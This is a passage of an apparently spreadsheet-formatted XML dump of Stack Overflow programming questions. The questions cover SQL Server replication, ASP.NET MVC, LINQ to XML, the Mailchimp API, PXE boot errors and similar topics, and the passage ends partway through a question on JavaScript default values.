    <t xml:space="preserve">&lt;p&gt;So, I've got SQL (2005) Transactional Replication generally working well with a single publisher and single (read-only) subscriber.  Data changes and updates flow perfectly, with about 5 second latency, which is just fine.  &lt;/p&gt;
&lt;p&gt;My one nagging problem, that I've spent a couple days trying to solve (and Googling everywhere for answers) is that &lt;em&gt;new&lt;/em&gt; sprocs/tables/etc. do not get propagated to the read-only subscriber, even though I've added them as "articles" to the "publication".  The publication has "transmit schema changes" set to ON, and stored procedures are set to transfer their definitions.  But, for some reason, they don't.&lt;/p&gt;
&lt;p&gt;My "snapshot agent" process is set to NOT SCHEDULED.  (In other words, it only happens once, when I initiate it manually.)  Should I be putting this on a schedule to enable the transfer of new or modified tables and sprocs?  &lt;/p&gt;
&lt;p&gt;I thought the mere act of adding the object as an article to the publication would do it, but it's still not sending it unless I do a snapshot.  The WAN connecting these is totally fast and reliable, so that's not the issue, and table-data-updates transfer relatively fast and flawlessly.&lt;/p&gt;
&lt;p&gt;While I could put my snapshot agent on a schedule, does this have any real-time production impacts for users of the main publication database or the read-only copy?  (My site currently gets 4+ million unique-users a month, so I'd like to have minimal disruption...)  Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I submit a form with a link in ASP.Net MVC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a HTML form, and I have a Controller Action that accepts the POST request. Everything works with a regular submit button, but I would like to submit the form with a link (&amp;lt;a&amp;gt;-tag) instead, to be able to further control the formatting. Is there any way of doing this nicely built into the ASP.NET MVC Framework, or should I write my own extension method? Is it even possible to do this without javascript (I will use AJAX in the future, but it has to work without).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Intel boot agent problem?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;keep getting this message over and over adin.. what shoud i do?
Intel(R) Boot Agent FE v4.1.17
Copyright (C) 1997-2004, Intel Corporation&lt;/p&gt;
&lt;p&gt;Intel(R) Boot Agent PXE Base Code (PXE-2.1 build 084)
Copyright (C) 1997-2004, Intel Corporation&lt;/p&gt;
&lt;p&gt;CLIENT MAC ADDR: 00 16 76 71 64 8B GUID:6377B694 F156 11DA 9A0F 00112FEBB9DF
PXE-E53: NO boot filename received&lt;/p&gt;
&lt;p&gt;PXE-M0F: Exiting Intel Boot Agent
No bootable device -- insert boot disk and press any key&lt;/p&gt;
</t>
  </si>
  <si>
    <t>LINQ to XML: Collapse mutliple levels to single list</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently working on a Silverlight app and need to convert XML data into appropriate objects to data bind to.  The basic class definition for this discussion is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class TabularEntry
    {
    	public string Tag { get; set; }
    	public string Description { get; set; }
    	public string Code { get; set; }
    	public string UseNote { get; set; }
    	public List&amp;lt;string&amp;gt; Excludes { get; set; }
    	public List&amp;lt;string&amp;gt; Includes { get; set; }
    	public List&amp;lt;string&amp;gt; Synonyms { get; set; }
    	public string Flags { get; set; }
    	public List&amp;lt;TabularEntry&amp;gt; SubEntries { get; set; }
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;An example of the XML that might come in to feed this object follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;I4 Ref="1"&amp;gt;222.2
    &amp;lt;DX&amp;gt;Prostate&amp;lt;/DX&amp;gt;
    &amp;lt;EX&amp;gt;
    	&amp;lt;I&amp;gt;adenomatous hyperplasia of prostate (600.20-600.21)&amp;lt;/I&amp;gt;
    	&amp;lt;I&amp;gt;prostatic:
    		&amp;lt;I&amp;gt;adenoma (600.20-600.21)&amp;lt;/I&amp;gt;
    		&amp;lt;I&amp;gt;enlargement (600.00-600.01)&amp;lt;/I&amp;gt;
    		&amp;lt;I&amp;gt;hypertrophy (600.00-600.01)&amp;lt;/I&amp;gt;
    	&amp;lt;/I&amp;gt;
    &amp;lt;/EX&amp;gt;
    &amp;lt;FL&amp;gt;M&amp;lt;/FL&amp;gt;
&amp;lt;/I4&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, various nodes map to specific properties.  The key ones for this question are the &lt;code&gt;&amp;lt;EX&amp;gt;&lt;/code&gt; and &lt;code&gt;&amp;lt;I&amp;gt;&lt;/code&gt; nodes.  The &lt;code&gt;&amp;lt;EX&amp;gt;&lt;/code&gt; nodes will contain a collection of one or more &lt;code&gt;&amp;lt;I&amp;gt;&lt;/code&gt; nodes and in this example matches up to the 'Excludes' property in the above class definition.&lt;/p&gt;
&lt;p&gt;Here comes the challenge (for me).  I don't have control over the web service that emits this XML, so changing it isn't an option.  You'll notice that in this example one &lt;code&gt;&amp;lt;I&amp;gt;&lt;/code&gt; node also contains another collection of one or more &lt;code&gt;&amp;lt;I&amp;gt;&lt;/code&gt; nodes.  I'm hoping that I could use a LINQ to XML query that will allow me to consolidate both levels into a single collection and will use a character that will delimit the lower level items, so in this example, when the LINQ query returned a TablularEntry object, it would contain a collection of Exclude items that would appear as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;adenomatous hyperplasia of prostate
(600.20-600.21)&lt;/li&gt;
&lt;li&gt;prostatic:&lt;/li&gt;
&lt;li&gt;*adenoma (600.20-600.21)&lt;/li&gt;
&lt;li&gt;*enlargement (600.00-600.01)&lt;/li&gt;
&lt;li&gt;*hypertrophy (600.00-600.01)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So, in the XML the last 3 entries are actually child objects of the second entry, but in the object's Excludes property, they are all part of the same collection, with the former child objects containing an identifier character/string.&lt;/p&gt;
&lt;p&gt;I have the beginnings of the LINQ query I'm using below, I can't quite figure out the bit that will consolidate the child objects for me.  The code as it exists right now is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;List&amp;lt;TabularEntry&amp;gt; GetTabularEntries(XElement source)
    	{
    		List&amp;lt;TabularEntry&amp;gt; result;
    		result = (from tabularentry in source.Elements()
    					 select new TabularEntry()
    					 {
    						 Tag = tabularentry.Name.ToString(),
    						 Description = tabularentry.Element("DX").ToString(),
    						 Code = tabularentry.FirstNode.ToString(),
    						 UseNote = tabularentry.Element("UN") == null ? null : tabularentry.Element("UN").Value,
    						 Excludes = (from i in tabularentry.Element("EX").Elements("I")
    										 select i.Value).ToList()
    					 }).ToList();
    		return result;
    	}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm thinking that I need to nest a FROM statement inside the &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Excludes = (from i...)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;statement to gather up the child nodes, but can't quite work it through.  Of course, that may be because I'm off in the weeds a bit on my logic.&lt;/p&gt;
&lt;p&gt;If you need more info to answer, feel free to ask.&lt;/p&gt;
&lt;p&gt;Thanks in advance,&lt;/p&gt;
&lt;p&gt;Steve&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mailchimp API &amp; array</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having a bear of a time getting the mailchimp api to cough up info. In their example I'm fine (the first is an abridged version of theirs.) How come when the method changes I can't get the array to show the collected information?&lt;/p&gt;
&lt;p&gt;Why is this code valid:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$limit = 5;
for($i=0;$i&amp;lt;5;$i++){
    $allstats = $acct-&amp;gt;campaignEmailStatsAIMAll($campaignId, $i*$limit, $limit);
    foreach($allstats as $email=&amp;gt;$stats){
        echo "[".$email."]\n";
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It's taken from here (I just removed some of the iterative data):&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;a href="http://www.mailchimp.com/api/rtfm/campaignemailstatsaimall.func.php" rel="nofollow"&gt;http://www.mailchimp.com/api/rtfm/campaignemailstatsaimall.func.php&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;But this code is not:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$limit = 5;
for($i=0;$i&amp;lt;5;$i++){
    $allstats = $acct-&amp;gt;campaignOpenedAIM($campaignId, $i*$limit, $limit);
    foreach ($allstats as $email =&amp;gt; $stats) { 
       echo $stats; 
    }       
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is the function listed here:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;a href="http://www.mailchimp.com/api/rtfm/campaignopenedaim.func.php" rel="nofollow"&gt;http://www.mailchimp.com/api/rtfm/campaignopenedaim.func.php&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Most importantly, as my attempt has failed, how would you write the second method (&lt;code&gt;campaignOpenAIM&lt;/code&gt;) to iterate through the data in the captured array? &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;It would appear that the array is empty. But why is it empty when the parameters haven't changed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Create &amp; Copy Access tables to SQL via SSIS? SQL 2008</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying come up with a way to pull the tables out of an Access database, automate the creation of those same tables in a SQL 2008 DB, and move the data to the new tables. This process will happen on a regular basis and there may be different tables each time.&lt;/p&gt;
&lt;p&gt;I would like to do this totally in SSIS. &lt;/p&gt;
&lt;p&gt;C# SQL CLR objects are an option.&lt;/p&gt;
&lt;p&gt;The main issue I have been running into is how to get the Access table's schema and then convert that to a SQL script that I can run via SSIS.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
&lt;p&gt;TIA
J&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to initialize a UINavigationController subclass from a NIB?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a &lt;code&gt;UITabBarController&lt;/code&gt; based application. The tabs will be created from database entries, so I don't know them in advance. I'd like to &lt;strong&gt;programmatically&lt;/strong&gt; initialize a &lt;code&gt;UINavigationController&lt;/code&gt; subclass (I have a few different kinds) for each tab. &lt;/p&gt;
&lt;p&gt;Ideally, I would really like to draw the whole &lt;code&gt;UINavigationController&lt;/code&gt; subclass + it's subview using Interface Builder, just like you can do when you add define the view for each tab in IB (that's when you know what the tabs will be in advance). I've tried setting the "Class identity" to my &lt;code&gt;UINavigationController&lt;/code&gt; subclass name, then add a &lt;code&gt;UINavigationController&lt;/code&gt; inside it, but obviously it didn't inject the instance at the "File's owner" level...&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>logical &amp; physical components</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For this group assignment we have to produce a design document which includes a decomposition of the system/intermodule dependencies as well as interprocess dependencies. &lt;/p&gt;
&lt;p&gt;We are warned to be aware of the differences between logical and physical components. Could someone please explain to me what each is? &lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to read mixed (i.e. text and binary) data?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to be able to read a file format that mixes binary and non-binary data.  Assuming I know the input is good, what's the best way to do this?  As an example, let's take a file that has a double as the first line, a newline (0x0D 0x0A) and then ten bytes of binary data afterward.  I could, of course, calculate the position of the newline, then make a BinaryReader and seek to that position, but I keep thinking that there has to be a better way.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Driving NDepend with NUnit</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to use NUnit to run CQL queries using NDepend?  It would be nice to be able to just include the NDepend dlls in a UnitTests library and write tests like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[Test] public void
DomainAssemblyHasNoDatabaseDependencies
...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or something similar.&lt;/p&gt;
&lt;p&gt;This would make it very easy to integrate with Team City, and automatically fail the build if any of the static analysis tests fail.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Accessing hardware from within Internet Explorer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to access hardware devices (web-cams, magnetic card readers, etc.) from within Internet explorer? &lt;/p&gt;
&lt;p&gt;If yes, what technologies are used? And are there any .Net examples.&lt;/p&gt;
&lt;p&gt;In my case, I need to access a magnetic card reader that would be attached to the client computer. The web-app would need to be able to access the reader and get the card information, which will then be used to access data-tables from a database running on the server.&lt;/p&gt;
&lt;p&gt;I have seen web-cams that are integrated into websites, was wondering how that is done? Because if web-cams can be accessed, so should any other device attached to a USB port.&lt;/p&gt;
&lt;p&gt;Finally, can SilverLight applications access hardware? Can they print to an attached printer?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I find the current machine's full hostname in C (hostname and domain information)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a C project (POSIX), how do I get the fully qualified name for the current system?&lt;/p&gt;
&lt;p&gt;For example, I can get just the hostname of my machine by doing
&lt;code&gt;gethostname()&lt;/code&gt; from unistd.h. This might give me &lt;code&gt;machine3&lt;/code&gt; in return, but I'm actually looking for &lt;code&gt;machine3.somedomain.com&lt;/code&gt; for example.&lt;/p&gt;
&lt;p&gt;How do I go about getting this information? I do not want to use a call to system() to do this, if possible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>scope in PHP classes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am creating a database connection object, and I'm not sure what the best way would be...&lt;/p&gt;
&lt;p&gt;If I create a dbConnection class which establishes the connection (using mysql_connect) can I then call mysql_query from anywhere in the main script?&lt;/p&gt;
&lt;p&gt;what about from inside OTHER classes? Do i need to pass the object or attribute as parameters?&lt;/p&gt;
&lt;p&gt;Basically, I'm looking for the best way (in terms of speed + memory) of connecting to the database ONCE using a simple class...&lt;/p&gt;
&lt;p&gt;I've posted my constructor for the Database Connection class:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function __construct($database="") {
if (!empty($database)){ $this-&amp;gt;db = $database; }
$this-&amp;gt;dblink = mysql_connect($this-&amp;gt;host,$this-&amp;gt;username,$this-&amp;gt;password);
if (!this-&amp;gt;dblink) {
	//Fatal Error
}
mysql_select_db($this-&amp;gt;db, $this-&amp;gt;dblink);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;}&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Extract email addresses from a block of text</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I create an array of email addresses contained within a block of text?
I've tried&lt;/p&gt;
&lt;p&gt;&lt;code&gt;addrs = text.scan(/ .+?@.+? /).map{|e| e[1...-1]}&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;but (not surprisingly) it doesn't work reliably. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL tables subquery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two tables named &lt;code&gt;foo&lt;/code&gt; and &lt;code&gt;bar&lt;/code&gt;, hypothetically speaking.&lt;/p&gt;
&lt;p&gt;foo has columns &lt;code&gt;foo_id&lt;/code&gt;, &lt;code&gt;foo_fluff&lt;/code&gt;
bar has columns &lt;code&gt;bar_id&lt;/code&gt;, &lt;code&gt;foo_id&lt;/code&gt;, &lt;code&gt;timestamp&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I need a query which will retrieve return one row for any foo_id that the table bar contains, with the latest timestamp.&lt;/p&gt;
&lt;p&gt;So, if bar has three rows, two of which have a foo_id of 1, and 1 of which has foo_id 2, it'll return 2 rows. For foo_id 1 it'll return the row which has the greater timestamp of the two rows.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Developing a Robocode type game with .Net, for a School Assignment</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently in my final year at school, studying for a Higher National Diploma in Computer Studies, and basically in this final semester, we need to develop a Software Project, that basically incorporates a &lt;em&gt;whole&lt;/em&gt; system.&lt;/p&gt;
&lt;p&gt;Now, what  I'm thinking of doing is something along the lines of &lt;a href="http://robocode.sourceforge.net/"&gt;Robocode&lt;/a&gt;, but instead of Java, I will be doing this with the .Net Framework.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;h2&gt;What is Robocode ?&lt;/h2&gt;
&lt;p&gt;For those of you don't know what Robocode is, it's basically a sort of programming game in where people develop their own robots using methods from the class interfaces and downloadable classes that exist, and then they &lt;em&gt;fight&lt;/em&gt; each other in an autonomous battle in an arena...like such: &lt;/p&gt;
&lt;p&gt;&lt;img src="http://articles.techrepublic.com.com/i/tr/cms/contentPics/robocode.gif" alt="alt text" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;So basically, as I said, I want to recreate this sort of scenario using the .Net Framework..and I am posting this question here on StackOverflow in hope that more experienced developers will be able to guide me in the right direction for this project.&lt;/p&gt;
&lt;p&gt;What I have in mind up till now is basically to create:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;An Offline application that will serve as the battle arena and the user-interface to create new battles with existing robots and such.&lt;/li&gt;
&lt;li&gt;An Online interface that players will able to use to register new robots, view past tournament scores etc...&lt;/li&gt;
&lt;li&gt;And obviously the Class Interfaces that players will need to use to create their robots.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;h2&gt;Animation and Graphics (for the actual battles)&lt;/h2&gt;
&lt;p&gt;Now, of course there will be some sort of animation and movement when the battle occurs, and I haven't decided what yet to use as a medium for this.&lt;/p&gt;
&lt;p&gt;The options I currently have in mind are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Developing, as I said in the first above bullet points, an offline application that will serve as a battle grounds, and all animations will be done using mainly C# code&lt;/li&gt;
&lt;li&gt;Or develop a Silverlight Application that will handle the animations (thus, changing the scenario from an offline applcation to now an online one&lt;/li&gt;
&lt;li&gt;Or, maybe the least feasable of them, create the battle animations using JavaScript, with something like the &lt;a href="http://https%3A//developer.mozilla.org/en/Canvas%5Ftutorial"&gt;Canvas&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;What do you think could be more suitable for this particular scenario ?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;h2&gt;Developing Classes and Interfaces&lt;/h2&gt;
&lt;p&gt;For the players to develop the robots, I will provide certain Class Interfaces that they will be able to use like in Robocode.&lt;/p&gt;
&lt;p&gt;Examples of such events and methods may include:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public void run () {}
public void onScannedRobot(ScannedRobotEvent e) {}
walk(/* ammount in pixels or w/e to walk to */);
turnRight(/* value in degrees for an angular turn */);
//etc...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is a snippet from code in Robocode (Java) :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class MyFirstRobot extends Robot {
    public void run() {
        while (true) {
             ahead(100);
             turnGunRight(360);
             back(100);
             turnGunRight(360);
         }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For then to actually make the battles happen, I am thinking of using Reflection to actually read what methods the user is actually making use of and implementing them to run and be invoked at particular moments of the battle and such.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Now, what I kindly and humbly ask of you experienced developers, is to guide me a bit through this project of mine and advise me on what needs to be done...for starters, &lt;strong&gt;&lt;em&gt;is this project feasible at all ?&lt;/em&gt;&lt;/strong&gt;  And if it actually is, &lt;strong&gt;&lt;em&gt;from where do I need to actually start with my project?&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;As regards technologies and software I intend to be using are : &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;.NET Framework 3.5, with C# 3.0&lt;/li&gt;
&lt;li&gt;LINQ (Language Integrated Query)&lt;/li&gt;
&lt;li&gt;SQL Server 2008&lt;/li&gt;
&lt;li&gt;Microsoft Visual Studio 2008&lt;/li&gt;
&lt;li&gt;jQuery Framework&lt;/li&gt;
&lt;li&gt;Possibly Silverlight&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;I thank you all, even for managing to read up to this point in my question and I will need and appreciate greatly all the help I can get to finish this project.&lt;/p&gt;
&lt;p&gt;Thank you for your time and effort.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Btw, up till now, apart from &lt;a href="http://robocode.sourceforge.net/"&gt;Robocode&lt;/a&gt;, I have found these games that are similar to what I am trying to create:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://home.gna.org/nrobot/"&gt;NRobot&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://vrs-net.sourceforge.net/"&gt;Virii&lt;/a&gt; (thanks &lt;a href="http://stackoverflow.com/questions/505040/developing-a-robocode-type-game-with-net-for-a-school-assignment#505076"&gt;Marc&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Refresh A Image Src</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;k... Strager was able to help me a bit. However, it's still not working quite right. Need someone that knows both MVC and jQuery please...&lt;/p&gt;
&lt;p&gt;I have a page that has a image that when clicked on will launch a dialog box that gives the ability to upload a file. Once the dialog closes the image is supposed to refresh with what was uploaded/stored in the database...&lt;/p&gt;
&lt;p&gt;All works great the first time. However if I try uploading a 2nd image; the 1st image still displays. It also doesn't seem like my controller method is being called the 2nd time... Below is my code...&lt;/p&gt;
&lt;p&gt;I've also eliminated that the page is being cached. Again, the controller method is not being called the 2nd time around...&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Controller&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[AcceptVerbs(HttpVerbs.Get)]
public ActionResult GetImage(Guid parentId)
{
    var la = Helper.Service.GetAttachmentByEntity(parentId, MembershipProvider.SecurityTicket).ToList();
    la.OrderByDescending(x =&amp;gt; x.CreatedDate);
    return File(la[0].Data, la[0].ContentType);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;View&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script type="text/javascript"&amp;gt;
    $(function() {
        var iphcObject = $('#&amp;lt;%=imagePlaceHolderControl.ClientID %&amp;gt;');
        iphcObject.children().find('#imageUploadDialog').bind('onClose', function() {
            iphcObject.children().find('#image').attr('src', '&amp;lt;%=Url.Action("GetImage", "Image", new { parentId = Model.ParentId }) %&amp;gt;');
        });
    });
&amp;lt;/script&amp;gt;
&amp;lt;asp:Panel ID="imagePlaceHolderControl" runat="server"&amp;gt;
    &amp;lt;div style="border: solid 1px; width: &amp;lt;%=Model.Width%&amp;gt;; height: &amp;lt;%=Model.Height%&amp;gt;; text-align: center; vertical-align: middle;"&amp;gt;
        &amp;lt;a href="#" onclick="$('#imageUploadDialog').dialog('open');" title="Add a picture..."&amp;gt;
        &amp;lt;img id="image" src="&amp;lt;%=Url.Content("~/content/images/icon_individual_blank.gif") %&amp;gt;" /&amp;gt;&amp;lt;/a&amp;gt;
        &amp;lt;%Html.RenderDialog("imageUploadDialog", "Upload image...", "ImagePlaceHolder_Upload", "Image", Model, 235, 335); %&amp;gt;        
    &amp;lt;/div&amp;gt;
&amp;lt;/asp:Panel&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to change the text color on UINavigationBar button items</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a UINavigationController and i've changed it to white using the Tint property of the navigation bar in Interface Builder. But the text in buttons and the title is still the default color, white, and so gets lost against the white background. Anyone know how to work around this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DeflateStream 4GB Limit in .NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;From MSDN: &lt;em&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/system.io.compression.deflatestream.aspx" rel="nofollow"&gt;DeflateStream Class&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;DeflateStream cannot be used to compress files larger than 4&amp;nbsp;GB.&lt;/p&gt;
&lt;p&gt;Are there any other implementations for .NET without the 4&amp;nbsp;GB limit?&lt;/p&gt;
&lt;p&gt;NOTE: I really need to decompress a file in GZ format with content larger than 4&amp;nbsp;GB. Can any code do that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Recommendation for Sqlite DB manager application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There are quite a few Sqlite GUI applications listed here:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.sqlite.org/cvstrac/wiki?p=ManagementTools"&gt;http://www.sqlite.org/cvstrac/wiki?p=ManagementTools&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;some appear to be incomplete, buggy, not maintained, etc. Do you have any recommendations?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Py2exe for Python 3.0</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for a Python3.0 version of "py2exe". I tried running 2to3 on the source for py2exe but the code remained broken.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can i know if a given SPWeb is a SearchCenter site programmatically</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a SPWeb object and I want to know whether or not this is a SearchCenter site. How can I know it programmatically. Is there some setting to check or a guid to match etc?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I specify a return url for a link to the login form?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Simple enough, it would seem, but it turns out not to be - mainly due to the fact that the View can't possibly know which way through Model and Controller you got there. Regardless, it is a problem that needs a solution:&lt;/p&gt;
&lt;p&gt;I have a login link, that takes the user to a form to enter username and password. When the user clicks "submit", I want to redirect to the page he was viewing. The easiest way to do so seems to be specifying the url to the current page as a querystring (&lt;code&gt;...?returnUrl=...&lt;/code&gt;) and everything else is already built.&lt;/p&gt;
&lt;p&gt;But where do I find this url from my view, when rendering the link? I naturally can't use a RedirectToActionResult as I don't want to actually transfer the user - only render the url in a link. How to?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;EDIT:&lt;/p&gt;
&lt;p&gt;I have now started a bounty on this question, and therefore I see fit to clarify my needs as well.&lt;/p&gt;
&lt;p&gt;I have a UserControl named Login.ascx in my Shared folder. In it, I render an ActionLink to the login form, and it is included in the footer on my Masterpage. What I want to accomplish is the following:&lt;/p&gt;
&lt;p&gt;When the ActionLink is rendered, the querystring &lt;code&gt;returnUrl&lt;/code&gt; is appended with &lt;strong&gt;the a route to the view that is currently being rendered&lt;/strong&gt;. If this is accomplished, the user will be taken back to the page he/she was viewing after successful login with functionality that is already build into the ASP.NET MVC Framework.&lt;/p&gt;
&lt;p&gt;The reason the previous answers have not been sufficient is mainly that they have not provided a way to &lt;strong&gt;build the route url to the current view&lt;/strong&gt;. I do know how to append a querystring, but I do not know how to find out what to put in that string.&lt;/p&gt;
&lt;p&gt;In order to mark an answer as &lt;em&gt;the&lt;/em&gt; answer, I want a method to re-construct the route to the currently shown view, from a usercontrol in the masterpage.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Don't static members make classes kind of (global) objects themselves?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Every time I come across an implementation of the singleton pattern or any static classes (i.e. classes with (almost) only static members) I wonder whether this isn't actually a hack and therefore heavy abuse of the principle of classes and instances just to design single objects instead of designing classes and creating a single instance. To me, it looks like static members of classes in general try to add some sort of characteristics to classes which they actually aren't supposed to have and which rather make them object themselves. &lt;/p&gt;
&lt;p&gt;But is it really desirable to have single objects implemented like that?
Or do you see things completely differently and don't think that such static classes or singletons have anything in common with actual objects?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get the next record in SQL table</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a set of records in my MS SQL table. With Date as the primary key. But the Dates are only for working days and not the continues days. Eg:&lt;/p&gt;
&lt;p&gt;1/3/2000 12:00:00 AM    5209.540000000	5384.660000000	5209.540000000	5375.110000000
1/4/2000 12:00:00 AM    5533.980000000	5533.980000000	5376.430000000	5491.010000000
1/5/2000 12:00:00 AM    5265.090000000	5464.350000000	5184.480000000	5357.000000000
1/6/2000 12:00:00 AM    5424.210000000	5489.860000000	5391.330000000	5421.530000000
1/7/2000 12:00:00 AM    5358.280000000	5463.250000000	5330.580000000	5414.480000000
1/10/2000 12:00:00 AM   5617.590000000	5668.280000000	5459.970000000	5518.390000000
1/11/2000 12:00:00 AM   5513.040000000	5537.690000000	5221.280000000	5296.300000000
1/12/2000 12:00:00 AM   5267.850000000	5494.300000000	5267.850000000	5491.200000000&lt;/p&gt;
&lt;p&gt;In this i am trying to introduce a new column to the table and the value to it should be the value of the 3rd cloumn minus the value of 3rd column of the previous working day. Please help me in writing such a query. I am finding it difficult as the dates are not present for the week ends.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are some resources for learning MSIL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can someone please give me a link to a tutorial or answer how to read msil. &lt;/p&gt;
&lt;p&gt;I think once I learn how to read this it could be a very useful tool.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Idiomatic way to set default value in javascript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What would be the most idiomatic way to do the following in javascript:&lt;/p&gt;
